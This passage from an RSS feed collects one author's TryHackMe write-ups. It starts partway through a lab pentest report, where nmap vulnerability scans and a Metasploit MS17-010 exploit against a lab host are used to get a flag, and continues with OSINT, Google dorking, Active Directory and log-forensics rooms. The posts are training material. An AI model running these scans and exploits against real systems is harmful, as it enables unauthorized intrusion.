However, interacting with RPC services without a password is generally not possible unless there are specific misconfigurations or vulnerabilities present in the target system. RPC services typically require authentication to ensure secure access and prevent unauthorized use.</p><p>Vulnerability Analysis</p><p>In-depth research about CVEs related to vulnerabilities on different ports is essential for organizations and security professionals. By staying informed about the specific vulnerabilities associated with ports commonly used by various services, we can proactively identify and mitigate potential risks. Understanding the nature and impact of these vulnerabilities allows organizations to prioritize security measures, allocate resources effectively, and implement appropriate countermeasures.</p><p>To this effect, I have created tables that display CVEs according to the NVD for the open ports in the target machine. The scores have been based on CVSS 3.x since CVSS 2.0 is out of date.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/842/1*VYg_pbpL4LB1NvvOVhsirw.png" /><figcaption>Note: NVD Analysts have not published a CVSS score for this CVE at this time. 
NVD Analysts use publicly available information at the time of analysis to associate CVSS vector strings.</figcaption></figure><p>The Nmap Scripting Engine (NSE) provides a wide range of script categories and options beyond just “smb” and “http”.</p><p>Using NSE I performed a lookup on all open ports:</p><p>• nmap -p 135 --script smb-vuln* 10.0.2.4</p><p>• nmap -p 139 --script smb-vuln* 10.0.2.4</p><p>• nmap -p 445 --script smb-vuln* 10.0.2.4</p><p>• nmap -p 49152 --script smb-vuln* 10.0.2.4</p><p>• nmap -p 49153 --script smb-vuln* 10.0.2.4</p><p>• nmap -p 49154 --script ssh-vuln* 10.0.2.4</p><p>• nmap -p 49155 --script smb-vuln* 10.0.2.4</p><p>• nmap -p 49156 --script smb-vuln* 10.0.2.4</p><p>• nmap -p 49158 --script smb-vuln* 10.0.2.4</p><p>This resulted in the discovery of a critical vulnerability on port 445.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Ou13wsPzk2qEGsoh4qh91g.png" /></figure><p>Vulnerability Title</p><p>- Remote Code Execution in Microsoft SMBv1 servers (ms17-010)</p><p>Vulnerability Severity (CVSS scale)</p><p>- High (CVSS score of 8.1)</p><p>Vulnerability Description</p><p>The vulnerability (CVE-2017-0143) allows remote attackers to execute arbitrary code on Microsoft SMBv1 servers. It affects the Confidentiality, Integrity, and Availability of the system. Exploiting this vulnerability can lead to unauthorized access, data theft, system compromise, and potential disruption of services.</p><p>Proof of Concept</p><ol><li>Open Metasploit and search for exploits related to ms17-010</li></ol><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*i9YmPcRA69dZU6RuMte8Sg.png" /></figure><p>2. Pick the first exploit and see options for possible actions. Set rhost to target machine address 10.0.2.4.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*IG-3RSoEoBhy0V5EexH71g.png" /></figure><p>3. 
Run exploit</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*xG-cxlQPxNFrlqoFksifgw.png" /></figure><p>4. When the exploit is finished, search for the flag using search -f flag.txt</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*BAScWJT8vhmPKPEcl63D2Q.png" /></figure><p>5. Change your directory and then read the contents by typing type flag.txt</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*jbsV74ZYEpc--gnurkbjmg.png" /></figure><p>Recommendations:</p><p>1. Apply the necessary security patches: Install the security updates provided by Microsoft to address the vulnerability. This includes the relevant patches mentioned in the Microsoft Security Bulletin MS17-010.</p><p>2. Disable SMBv1: If possible, consider disabling SMBv1 on affected systems to prevent the exploitation of this vulnerability. SMBv1 is an outdated protocol and disabling it can reduce the attack surface.</p><p>3. Enable SMBv2 or SMBv3: Upgrade to the newer versions of the SMB protocol (SMBv2 or SMBv3) where possible, as they include security enhancements and address the vulnerabilities present in SMBv1.</p><p>4. Network Segmentation: Implement network segmentation to isolate critical systems from potentially vulnerable systems. This can help contain the impact of any potential attacks targeting the vulnerability.</p><p>5. 
Implement strong security practices: Follow best practices for securing network services, such as regularly updating and patching systems, implementing strong access controls, using firewalls to restrict access, and monitoring for any suspicious network activity.</p><p>Consider implementing additional security measures, such as intrusion detection and prevention systems (IDPS), network monitoring, and user awareness training, to enhance the overall security posture and prevent potential exploitation of vulnerabilities.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[TryHackMe | OhSINT]]></title>
            <link>https://medium.com/@ibanezdom96/tryhackme-ohsint-bfe1028d3aa3?source=rss-2e646eb867b1------2</link>
            <guid isPermaLink="false">https://medium.com/p/bfe1028d3aa3</guid>
            <dc:creator><![CDATA[Dom Ibanez]]></dc:creator>
            <pubDate>Sat, 08 Apr 2023 21:29:47 GMT</pubDate>
            <atom:updated>2023-04-08T21:29:47.901Z</atom:updated>
            <content:encoded><![CDATA[<p>TryHackMe Public Profile: <a href="https://tryhackme.com/p/dom.ibanez">https://tryhackme.com/p/dom.ibanez</a></p><p>This is a guide for the OhSINT room. The room is straightforward in that it is just a downloadable jpg which we will have to investigate in order to answer the following questions:</p><p>1. What is this user’s avatar of?</p><p>2. What city is this person in?</p><p>3. What’s the SSID of the WAP he connected to?</p><p>4. What is his personal email address?</p><p>5. What site did you find his email address on?</p><p>6. Where has he gone on holiday?</p><p>7. What is this person’s password?</p><p>OSINT, or Open Source Intelligence, is the practice of collecting and analyzing information that is publicly available. We need to determine what we want to accomplish through our OSINT research. In this exercise we will use search engines, social media, and other online sources to gather information.</p><p>First we will boot Kali up and bring the jpg over for investigation.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/532/1*ICVeZ61B8cO8VHPL93D1nA.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/624/1*zmzr6KLcHZC0oXWKl3FcnQ.png" /></figure><p>After you have installed ExifTool, run it and record the results.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/624/1*kFgO2IE2pvdt2EYMUyEawA.png" /></figure><p>You will notice a Copyright field; we will investigate this further. A quick Google search reveals the following links.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/624/1*DXLDf4IwykjrweGydkHlUA.png" /></figure><p>1. What is this user’s avatar of?</p><p>It is a cat, as featured on their Twitter page.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/420/1*6GNqN92vLh0BzbG2pBuArA.png" /></figure><p>2. 
What city is this person in?</p><p>This person is in London according to their GitHub profile.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/624/1*BVUFwkQiLOvkqJSFdi2qcQ.png" /></figure><p>3. What’s the SSID of the WAP he connected to?</p><p>We need to use a finder for this question. In this instance we will use WiGLE. Create an account first.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/624/1*jLP5kxNiRIrft1ui6ZCsiQ.png" /></figure><p>Then we will perform a query on the BSSID which has been provided on Twitter.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/343/1*W4CWEuteNYZtp-XcAdvUBA.png" /></figure><p>The SSID is UnileverWiFi.</p><p>4. What is his personal email address? 5. What site did you find his email address on?</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/624/1*SIBlK3S59ie0JBvi8Yl9BA.png" /></figure><p>Their email is featured on GitHub.</p><p>6. Where has he gone on holiday?</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/624/1*4ESLx1rhmTLcdZHl4M4-4g.png" /></figure><p>He went to New York.</p><p>7. What is this person’s password?</p><p>Hidden in the WordPress page is a string in white, “pennYDr0pper.!” This is likely the password.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/520/1*U1RkomiGuqKVKz1xqmmPwQ.png" /></figure><p>That concludes this writeup.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[TryHackMe | Google Dorking]]></title>
            <link>https://medium.com/@ibanezdom96/tryhackme-google-dorking-6ab5d6917bdb?source=rss-2e646eb867b1------2</link>
            <guid isPermaLink="false">https://medium.com/p/6ab5d6917bdb</guid>
            <dc:creator><![CDATA[Dom Ibanez]]></dc:creator>
            <pubDate>Sat, 08 Apr 2023 00:42:23 GMT</pubDate>
            <atom:updated>2023-04-08T00:42:23.534Z</atom:updated>
            <content:encoded><![CDATA[<p>TryHackMe Public Profile: <a href="https://tryhackme.com/p/dom.ibanez">https://tryhackme.com/p/dom.ibanez</a></p><p>Part 1</p><p>Today we are going to discuss the Google Dorking room on TryHackMe. Being good at using search engines is a necessity for cybersecurity professionals because it allows them to quickly and efficiently find information related to security. Cybersecurity professionals need to conduct research on various topics such as vulnerabilities, threat actors, attack techniques, and security tools. Search engines are a valuable resource for finding this information.</p><p>When investigating a security incident, cybersecurity professionals often need to collect and analyze data from various sources, such as logs, network traffic, and system files. Search engines can help them find relevant information quickly, which can be crucial in a fast-paced investigation. Additionally, search engines can help cybersecurity professionals stay up-to-date on the latest security news and trends, enabling them to stay ahead of potential threats. Therefore, being skilled in using search engines is essential for cybersecurity professionals to effectively protect organizations from cyber threats.</p><p>Here is a simple diagram of how web crawlers work:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*v6hXJ8xKT-JKmeT2lj6Brw.png" /></figure><p>When a crawler “indexes,” it means that the crawler has visited a webpage and analyzed its content, storing information about the page in the search engine’s database. This information includes the page’s URL, title, meta description, text content, images, links, and other relevant data. 
By analyzing this information, the search engine’s algorithm can determine the relevance and importance of the page in relation to specific search queries.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*4qQTOE1E28tZiG1xr7HU1g.png" /></figure><p>Indexing is a crucial step in the search engine process, as it enables the search engine to create a comprehensive and organized database of web pages that can be quickly searched and accessed by users. When a user enters a search query, the search engine’s algorithm scans its index and returns a list of relevant pages based on factors such as keyword relevance, content quality, and backlinks. The more pages a search engine indexes, and the more frequently it updates its index, the more comprehensive and accurate its search results will be.</p><p>A search engine crawler, also known as a spider or bot, is an automated program used by search engines to discover, scan, and index web pages on the Internet. The crawler follows links from one page to another, collecting information about the content, structure, and links of each page it visits. This information is then analyzed by the search engine’s algorithm to determine the relevance and importance of the page in relation to specific search queries. Crawlers use various techniques to identify and prioritize pages to crawl, including following links from other pages, submitting URLs to be crawled, and monitoring changes to pages they have previously crawled. The use of crawlers allows search engines to create comprehensive indexes of the web, which can be quickly searched and accessed by users looking for specific information.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*Ksn4nz9CH3CIoQ3EmRgT5Q.png" /></figure><p>Once a web crawler discovers a domain such as mywebsite.com, it will attempt to index the contents of the domain, following links from one page to another to find and collect information about the content on each page. 
The crawler will look for various elements on the pages, including text content, images, links, metadata, and other structured data.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*w6CW5S8iR91i3TVQx_EG-g.png" /></figure><p>Part 2</p><p>When you search for something on Google, the search engine tries to show you the most relevant and useful results. SEO is the practice of optimizing a website or content to make it more likely to appear at the top of those search results.</p><p>For example, if you have a website selling shoes, you would want to optimize your website so that when someone searches for “buy shoes online,” your website would be one of the first results they see.</p><p>SEO involves various techniques, such as using relevant keywords, creating high-quality content, improving website speed and user experience, building links from other websites, and more. The goal of SEO is to increase the visibility and traffic to your website, ultimately resulting in more sales or conversions.</p><p>SEO is a popular topic in search engines and many businesses focus on improving their website’s SEO ranking. Search engines prefer domains that are easy to index and there are several factors that determine a domain’s score. Search engines use algorithms to rank domains, but they don’t share how this ranking system works. You can pay to advertise or boost your domain’s ranking in search results.</p><p>Here’s a sample of an SEO rating for tryhackme:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/624/1*aepFzN0uPkpvlrc2DPvkxw.png" /></figure><p>Part 3</p><p>In this part we will discuss how to prevent certain directories from being indexed. 
Search engines will want to retrieve everything from a website but there are cases where we wouldn’t want all of the contents of our website to be indexed.</p><p>Robots.txt is a file that website owners create to give instructions to web robots or crawlers, such as search engine bots, on how to crawl and index their website’s pages. The robots.txt file is placed in the root directory of the website and contains specific directives to tell the web robots which pages or parts of the website to crawl and index, and which pages or files to ignore.</p><p>This file can be used to prevent certain pages from being indexed, control the crawl rate, and indicate the location of the website’s sitemap. The robots.txt file is an essential tool for website owners to manage how their website is crawled and indexed by search engines and other web robots.</p><p>Here is a basic markup of the robots.txt file:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/569/1*utoKKHYPgwVDRZQdFEZESg.png" /></figure><p>Here are some terms and definitions.</p><ul><li>User-agent — Specify the type of “Crawler” that can index your site (the asterisk being a wildcard, allowing all “User-agents”)</li><li>Allow — Specify the directories or file(s) that the “Crawler” can index</li><li>Disallow — Specify the directories or file(s) that the “Crawler” cannot index</li><li>Sitemap — Provide a reference to where the sitemap is located (improves SEO as previously discussed, we’ll come to sitemaps in the next task)</li></ul><p>To prevent files from being indexed do this:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/456/1*GzfetnnAg9ueM--TvUGgqA.png" /></figure><p>The “Crawler” cannot index <strong>any </strong>file that has the extension <strong>.ini </strong>within any directory/sub-directory of the site, using (“$”) to anchor the match at the end of the URL.</p><p>Part 4</p><p>A sitemap is a file that lists all of the pages on a website that are available for crawling and indexing by search engines. 
The typical file structure of a sitemap is an XML file that includes URLs of the pages on a website.</p><p>The XML sitemap consists of a root element &lt;urlset&gt; and individual &lt;url&gt; elements for each URL. Each &lt;url&gt; element includes information such as the URL of the page, the date it was last modified, and how frequently the page is updated.</p><p>Just as a map helps people navigate through a new or unfamiliar place, a sitemap helps search engine crawlers navigate and understand the structure of a website. It provides a clear and easy-to-follow roadmap for search engines to follow, which can help ensure that all pages on a website are crawled and indexed properly.</p><p>However, unlike a map with lines and shapes, sitemaps look like this:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/588/1*ss80eectQ3CJddD-e5rRvQ.png" /></figure><p>When a search engine crawler accesses a sitemap, it reads the information contained within it and uses it to determine how to crawl and index the pages on the website. The crawler may follow links from the sitemap to other pages on the site, or it may crawl pages that are not included in the sitemap.</p><p>Part 5</p><p>Google dorking, also known as Google hacking, is a technique that involves using advanced search operators and search parameters in Google search to uncover sensitive information that is not readily available through regular search queries.</p><p>This potentially dangerous tool allows individuals to use specific search terms and operators to identify vulnerable websites, locate hidden information, or discover sensitive information that may have been exposed online. It is often used by security researchers and hackers to find vulnerabilities and weaknesses in websites and networks.</p><p>It can be used to search for various types of information, such as login pages, SQL errors, exposed documents, and more. 
However, it is important to note that using Google dorking to gain unauthorized access to systems or networks is illegal and can result in criminal charges.</p><p>Directory traversal, also known as path traversal or directory climbing, is a technique used to access files and directories stored outside of the web root directory of a web application.</p><p>In a web application, the web root directory is the directory from which the application serves files to visitors. It is generally considered safe to serve files only from within the web root directory, as it helps to prevent unauthorized access to sensitive files and directories on the server.</p><p>Here is an example of such a technique:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/477/1*8_XsiKaCVlXJH6vlEfxfxA.png" /></figure><p>This concludes the write-up.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Tryhackme | Active Directory Basics]]></title>
            <link>https://medium.com/@ibanezdom96/active-directory-basics-50b57ba955d2?source=rss-2e646eb867b1------2</link>
            <guid isPermaLink="false">https://medium.com/p/50b57ba955d2</guid>
            <dc:creator><![CDATA[Dom Ibanez]]></dc:creator>
            <pubDate>Tue, 04 Apr 2023 05:08:01 GMT</pubDate>
            <atom:updated>2024-03-23T21:25:10.842Z</atom:updated>
            <content:encoded><![CDATA[<p>Tryhackme profile: <a href="https://tryhackme.com/p/dom.ibanez">https://tryhackme.com/p/dom.ibanez</a></p><p>This is my guide to the Active Directory Basics room on TryHackMe.</p><p>Active Directory is a crucial component of the corporate world, simplifying the management of devices and users within a business environment. To overcome scalability challenges, network administrators rely on a Windows domain, which comprises a group of users and computers under the administration of a given business. The key objective of a domain is to centralize the management of common components of a Windows computer network within a single repository known as Active Directory (AD). The Domain Controller (DC) is the server that runs the Active Directory services.</p><p>Configuring a Windows domain provides several advantages, including centralized identity management, where all users across the network can be effortlessly configured from Active Directory. Additionally, you can configure security policies directly from Active Directory and apply them to users and computers across the network as required, making it easier to manage security policies.</p><p>Here is a diagram of the sample domain featured in the work room:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/452/1*528HN4fdJatK5uNjy89R0A.png" /></figure><p>The first two questions are answerable by looking at the information on the room page.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*EDYHBAX_KeZdOr9qdAI1lA.png" /></figure><p>We will now begin by establishing an RDP connection with the provided machine. Click on “Start Machine” and enter the IP provided. 
Then sign in with the credentials given.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*b0hJiivoZw4OQ6SslxqEnA.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*CIwcfTJzye7iILyTJN2KxQ.png" /></figure><p>The answers to the next few questions you are asked are also written on the exercise page.</p><p>These are the types of security groups:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*82oI69PhqsfIzClqzHySOw.png" /></figure><p>Domain Admins normally administer all computers and resources in a domain.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*uKTFOy-__r_DJwgDLyvU6Q.png" /></figure><p>Knowing the name of the machine account for “TOM-PC” is also laid out in the work information.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*Z6mCQndEEMv1wze-R5LFoA.png" /></figure><p>Therefore the machine account for “TOM-PC” would be “TOM-PC$”.</p><p>Organizational Units (OUs) are container objects that help organize the objects within Active Directory. OUs are particularly useful for classifying users and machines into logical groups based on their policy requirements. For instance, the Sales department in your organization may require different policies than the IT department. It’s worth noting that a user can belong to only one OU at a time.</p><p>The next part is all about checking the existing AD OUs and users. 
To help us out here is an organizational chart.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*8QusAPSuqAaIDYBfTH6ajw.png" /></figure><p>We will need to delete the OU that got cut.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*JXeFoty6Vx5l1OpWHKGIBg.png" /></figure><p>Uncheck the box in the OU’s properties that protects it from deletion, then delete it.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*ruLtj7eI7H08OvjfGIIG-w.png" /></figure><p>Next, delegate permission to Phillip: use the delegation wizard and check the second option.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*sujEZc3zz0K-YeE-pA_Miw.png" /></figure><p>After that, the next step is to reset Sophie’s password. RDP in as Phillip.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*1BwiTgwVqBIU2EGAg0dGqg.png" /></figure><p>Input this command in PowerShell to change Sophie’s password.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*aWDnWo1ZWA3ASSaUF_JxTw.png" /></figure><p>Input this command in PowerShell to force a password reset at the next logon.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*V24AVpnG0BM1Cszcm0mOpg.png" /></figure><p>Log on as Sophie and promptly change the password.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*VQYjy7iz26-XOgAsRkBFBQ.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*P5PzogrkHjf1wBEx2hpUjA.png" /></figure><p>We have just delegated. The process of granting privileges to a user over some OU or other AD object is called delegation.</p><p>Create Workstation and Server OUs</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*_QmOiJ0iPyJD_5WcZhsDWQ.png" /></figure><p>Move the servers to the Server OU and the PCs to the Workstation OU. 
There should be 7 in Workstation and 3 in Server.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*yg8SXPl_ZQrNkQ5MhnGk0A.png" /></figure><p>It is recommended to create separate OUs for Servers and Workstations.</p><p>For the next step we are asked to investigate Group Policy (GP) management. To this end we will change the minimum password length. In order to do this, follow this path: <br>Computer Configuration -&gt; Policies -&gt; Windows Settings -&gt; Security Settings -&gt; Account Policies -&gt; Password Policy. Then when the window shows up, do as demonstrated.</p><p>Once a change has been made to any GPOs, it might take up to 2 hours for computers to catch up.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*65QugwDjikKgDboZyWxdEQ.png" /></figure><p>Next we shall create a new GPO; let’s call it Restrict Control Panel Access. We have to enable this rule:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*wK3X7pkzNqmClUO6nU0yVA.png" /></figure><p>Then proceed to include Management, Marketing and Sales in it.</p><p>Next we will set up the Auto Lock Screen GPO. To do this go to the existing GPO settings and select security options.</p><p>Set it to 300 seconds.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/472/1*R8UkEFn6dk_tkb7G7FQppw.png" /></figure><p>GPOs are distributed to the network via a network share called SYSVOL, and GPOs can be used to apply settings to users and computers.</p><p>The next part is mostly theory.</p><p>When Kerberos is used for authentication, the following process occurs:</p><p>Firstly, the user sends their username and a timestamp encrypted with a key derived from their password to the Key Distribution Center (KDC), which is usually installed on the Domain Controller. The KDC then sends back a Ticket Granting Ticket (TGT), which allows the user to request additional tickets to access specific services. 
Along with the TGT, a Session Key is given to the user, which they will need to generate the following requests. It is important to note that the TGT is encrypted with the krbtgt account’s password hash, which means the user cannot access its contents. However, the TGT contains a copy of the Session Key, and the KDC can recover a copy by decrypting the TGT if required.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*Oxqu0csEApc4O_NmLKBx9w.png" /></figure><p>Secondly, when the user wants to connect to a service like a website, share or database, they will use their TGT to request a Ticket Granting Service (TGS) from the KDC. To request a TGS, the user will send their username and a timestamp encrypted with the Session Key, along with the TGT and a Service Principal Name (SPN), which indicates the service and server name they intend to access. The KDC will then send a TGS along with a Service Session Key, which the user needs to authenticate to the desired service. The TGS is encrypted using a key derived from the Service Owner Hash, and it contains a copy of the Service Session Key on its encrypted contents.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*Oxqu0csEApc4O_NmLKBx9w.png" /></figure><p>Finally, the TGS is sent to the desired service to authenticate and establish a connection. The service will use its configured account’s password hash to decrypt the TGS and validate the Service Session Key.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*Oxqu0csEApc4O_NmLKBx9w.png" /></figure><p>Active Directory enables the integration of multiple domains, allowing you to divide your network into independent units that can be managed separately. When two domains have the same namespace, they can be joined together to form a Tree. This partitioned structure provides better control over access to domain resources. 
Each branch has its own domain controller responsible for managing its resources, ensuring that UK users cannot manage US users, for example. The policies can also be configured independently for each domain in the tree.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*OCqwa5M_6Fe6IQFWBNwW-A.png" /></figure><p>A forest is formed when several trees with different namespaces are united into a single network. This arrangement of multiple domains in trees and forests offers a well-organized network in terms of resource and management compartmentalization. However, situations may arise where a user in one domain needs to access resources in another domain. In such cases, domains that are arranged in trees and forests are joined together using trust relationships.</p><p>Thank you for reading my guide.</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=50b57ba955d2" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[TryHackMe | Juicy Details Guide]]></title>
            <link>https://medium.com/@ibanezdom96/juicy-details-tryhackme-guide-a75d968a6506?source=rss-2e646eb867b1------2</link>
            <guid isPermaLink="false">https://medium.com/p/a75d968a6506</guid>
            <dc:creator><![CDATA[Dom Ibanez]]></dc:creator>
            <pubDate>Sun, 19 Mar 2023 22:24:12 GMT</pubDate>
            <atom:updated>2024-03-23T21:25:45.252Z</atom:updated>
<content:encoded><![CDATA[<p>TryHackMe | Juicy Details Guide</p><p>TryHackMe Public Profile:</p><p><a href="https://tryhackme.com/p/dom.ibanez">https://tryhackme.com/p/dom.ibanez</a></p><p><strong>Task 2: Reconnaissance</strong></p><p>The first step is to answer the prompt and download the important files.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*jBAcOzbp31z7ndjv3JPTQw.png" /></figure><p>Extract the logs from the zip file. The next question asks us for the tools that the attacker used. This means we will be looking at the access.txt file. When we take a closer look, we are able to see the different tools that were run.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*YejXte-nqz1oJcQofFaitw.png" /></figure><p>Nmap: Nmap is a network exploration and security auditing tool that is used to discover hosts and services on a computer network, thus creating a map of the network. It can be used to identify hosts and services, perform port scanning, and detect vulnerabilities.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*nE-1JNuWtLrRx9BBaF2y5g.png" /></figure><p>Hydra: Hydra is a password cracking tool used to perform brute-force attacks on various protocols such as SSH, FTP, Telnet, and more. It can be used to test the strength of passwords and identify weak passwords in a network.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*pLrp1C4rYPVT7XxLjDictw.png" /></figure><p>Sqlmap: Sqlmap is an open-source penetration testing tool used for detecting and exploiting SQL injection vulnerabilities in web applications. It can be used to perform database fingerprinting, dumping data from databases, and executing arbitrary SQL commands.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*cgxiEre7UHndRDhtraObvw.png" /></figure><p>Curl: Curl is a command-line tool for transferring data from or to a server. 
It supports various protocols such as HTTP, HTTPS, FTP, FTPS, SCP, SFTP, and more. It can be used to transfer files, download web pages, and interact with REST APIs.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*KxflzxbRLvXTL8N_rHL-SA.png" /></figure><p>Feroxbuster: Feroxbuster is a web directory and file bruteforcer that is used to discover hidden content on web servers. It can be used to discover hidden directories and files on a web server, identify sensitive files, and find hidden API endpoints.</p><p>The next question asks which endpoint was vulnerable to the hydra tool. One look at the logs tells us what we need to know:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*wizR9NBbwYF4omMPdrx9_A.png" /></figure><p>Next it asks us which endpoint was vulnerable to SQL injection. We will look at the first use of the sqlmap tool:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*zPz_IGRQBd8_HySSlhC9cg.png" /></figure><p>The directory path is the answer, and the parameter is specified as “q”.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*AnUzCUdenqzwTqekQpDZtg.png" /></figure><p>The endpoint is FTP; it is found near the end of the document.</p><p><strong>Task 3: Stolen Data</strong></p><p>The first question asks us which section of the website the attacker used to scrape user email addresses. Still referencing the access logs, we will assume the point of view of an attacker: emails can perhaps be found in the product review sections of online stores.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*ggQxQ3nXZd7e1IWWT1NWkw.png" /></figure><p>Then we are asked if the brute-force attack was successful. 
When looking at the logs we can see that after the entries for Hydra, the attacker did indeed get admin access.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*QEwPg3EYeINk8iQn41XvqQ.png" /></figure><p>They retrieved the email and password from the attack; the endpoint used was the one from the previous task, which had to do with SQL.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*Mc65EMVNTnFzMMXesWSY4Q.png" /></figure><p>We also know that the two files they downloaded were shown at the bottom of the log.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*gcOGmwBToBVCOIEdJ9k2pg.png" /></figure><p>For the next question we will be looking at the vsftpd log. Vsftpd logs contain information about FTP transactions and activities that occur on the server. The question asks us which service and account name were used to retrieve the files from the previous question. Here we see the files; the service used was ftp and the account name is anonymous.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*zb9L3QZkhbfpJ97dQFsNpg.png" /></figure><p>For the final question we are asked which service and username were used to gain shell access to the server. The auth.log file is a system log file found in Unix and Linux-based operating systems. It contains information about user authentication and authorization activities on the system, such as login attempts, password changes, and other security-related events. We see the brute-force attempts, and ultimately one goes through. The service and username are ssh and www-data respectively.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*hKgc2mIQY8RZbbC6zRaTqA.png" /></figure><p>That wraps up the guide.</p>]]></content:encoded>
        </item>
    </channel>
</rss>